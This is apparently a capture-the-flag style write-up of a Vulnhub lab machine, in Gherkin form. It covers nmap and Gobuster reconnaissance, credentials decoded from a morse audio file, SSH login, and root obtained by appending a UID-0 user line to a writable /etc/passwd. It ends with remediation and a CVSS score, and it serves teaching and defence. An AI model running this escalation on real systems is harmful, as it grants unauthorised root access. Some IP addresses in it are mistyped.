## Version 1.4.1
## language: en

Feature:
  TOE:
    Vulnhub
  Location:
    192.168.1.59
  CWE:
    CWE-269: Improper Privilege Management
    CWE-266: Incorrect Privilege Assignment
  Rule:
    REQ.186: Use the principle of least privilege
  Goal:
    get root access
  Recommendation:
    Use the principle of least privilege

  Background:
  Hacker's software:
    | <Software name> | <Version>   |
    | VirtualBox      |     6.1     |
    | Google Chrome   |84.0.4147.135|
    | nmap            |     7.8     |
    | Gobuster        |    2.0.1    |
  TOE information:
    Given I open the .ova file
    And I select bridge adapter in network tap
    Then I open a terminal
    And I search the IP address using nmap
    """
    $nmap -sn 192.168.1.1-254
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-05 18:52 -05
    Nmap scan report for 192.168.1.51
    Host is up (0.0062s latency).
    Nmap scan report for 192.168.1.52
    Host is up (0.077s latency).
    Nmap scan report for rechavar-Nitro-AN515-52 (192.168.1.55)
    Host is up (0.00080s latency).
    Nmap scan report for 192.168.1.59
    Host is up (0.00071s latency).
    Nmap scan report for 192.168.1.70
    Host is up (0.019s latency).
    Nmap scan report for _gateway (192.168.1.254)
    Host is up (0.069s latency).
    Nmap done: 254 IP addresses (6 hosts up) scanned in 12.24 seconds
    """
    When I open '192.168.1.59' I can see [evidence](image1.png)


  Scenario: Normal use case
    Given I start the machine
    And I can see [evidence](image2.png)
    When  I open the IP address in Google I can see [evidence](image1.png)
    Then I conclude that only shows  a Vegeta picture

  Scenario: Static detection
    Given I don't have access to the source code
    Then I can't do Static detection

  Scenario: Dynamic detection
    Given I start the VM
    And I use nmap to see wich ports are open
    """
    $nmap -sV 196.168.1.59
    Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-06 09:26 -05
    Nmap scan report for 192.168.1.59
    Host is up (0.00016s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
    80/tcp open  http    Apache httpd 2.4.38 ((Debian))
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

    Service detection performed. Please report any incorrect results at
    https://nmap.org/submit/
    Nmap done: 1 IP address (1 host up) scanned in 7.15 seconds
    """
    Then I download the 'directory-list-2.3-big.txt'
    And I search for hidden directories using Gobuster
    When I run the search I can see [evidence](image3.png)
    """
    gobuster -u http://192.168.1.59:80 -w path/to/directory-list-2.3-big.txt
    """
    Then I search on each of those directories
    When I search on '/img' I can see [evidence](image4.png)
    """
    http://192.168.1.59:80/img
    """
    And I click on 'vegeta.jpg' to see [evidence](image5.png)
    Then I download the image
    And I open it with Notepad++ to see if there's something inside the image
    Then I view the exif
    When I apply this I can't see anything useful
    Then I search on '/image' directory
    And I can see [evidence](image6.png)
    """
    http://198.162.1.59:80/image
    """
    Then I search on '/admin'
    """
    http://198.162.1.59:80/admin
    """
    And I can't see anything useful
    When I figure out that /manual is apache documentation
    Then I search on '/bulma'
    And I can see [evidence](image7.png)
    """
    http://192.168.1.59:80/bulma
    """
    When I listen to the .wav file I figure out that is morse code
    Then I search an online morse code decoder
    And I find 'morsecode.world'
    When I upload and play the file I can see [evidence](image8.png)
    """
    USER : TRUNKS PASSWORD : US3R(S IN DOLLARS SYMBOL)
    """
    Then I open a ubuntu terminal
    And using the ssh port I connect to the VM [evidence](image9.png)
    """
    $ ssh trunks@192.168.1.59 -p 22
    trunks@192.168.1.59's password: u$3r
    """
    Then I inspect which files are in the current path
    """
    $ ls - la
    total 28
    drwxr-xr-x 3 trunks trunks 4096 Jun 28 21:32 .
    drwxr-xr-x 3 root   root   4096 Jun 28 17:37 ..
    -rw------- 1 trunks trunks  415 Oct  6 20:53 .bash_history
    -rw-r--r-- 1 trunks trunks  220 Jun 28 17:37 .bash_logout
    -rw-r--r-- 1 trunks trunks 3526 Jun 28 17:37 .bashrc
    drwxr-xr-x 3 trunks trunks 4096 Jun 28 19:45 .local
    -rw-r--r-- 1 trunks trunks  807 Jun 28 17:37 .profile
    """
    When I see '.bash_history' I print it on terminal [evidence](image10.png)
    """
    cat .bash_history
    """
    Then I see if trunks user have write privileges over passwd file
    """
    $ls -la /etc/passwd
    -rw-r--r-- 1 trunks root 1539 Oct  6 21:45 /etc/passwd
    """
    When I see that I conclude that is vulnerable to privileges escalation

  Scenario: Exploitation #M
    Given the passwd file
    Then I search on passwd file to see users privilege [evidence](image11.png)
    """
    cat /etc/passwd
    """
    When I figure out that using bash_history info I can set Tom as root user
    Then I type
    """
    echo "Tom:ad7t5uIalqMws:0:0:User_like_root:/root:/bin/bash" >> /etc/passwd
    """
    Then I login as Tom user using the salted password that is in bash_history
    """
    $ su Tom
    password: Password@973
    """
    And I can see [evidence](image12.png)
    Then I navigate to root directory
    And I print the files that are in the directory [evidence](image13.png)
    When I print 'root.txt' file I can see [evidence](image14.png)

  Scenario: Remediation
    Given The VM
    Then I search for information about '/etc/passwd'
    """
    $ ls -la /etc/passwd
    -rw-r--r-- 1 trunks root 1539 Oct  6 21:45 /etc/passwd
    """
    Then I realize that trunks is passwd owner
    And the file has writable permissions
    When I see this I log as Tom
    And I change file ownership and permissions[evidence](image15.png)
    """
    $ chown Tom /etc/passwd
    $ chmod -R u-w /etc/passwd
    """
    Then I log as trunks
    When I try to write in passwd
    And try to change passwd permissions I can see [evidence](image16.png)
    When I see this I conclude that this vulnerability is patched
    Then I suggest using the least privilege principle
    And Try to keep kernel up to date
    And Don't give writable permissions to sensitive files

  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.0/10 (High) - AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
  Temporal: Attributes that measure the exploit's popularity and fixability
    8.6/10 (High) - E:H/RL:O/RC:C
  Environmental: Unique and relevant attributes to a specific user environment
    8.7/10 (High) - CR:H/IR:H/AR:H
  Scenario: Correlations
    No correlations have been found to this date {2020-10-06}
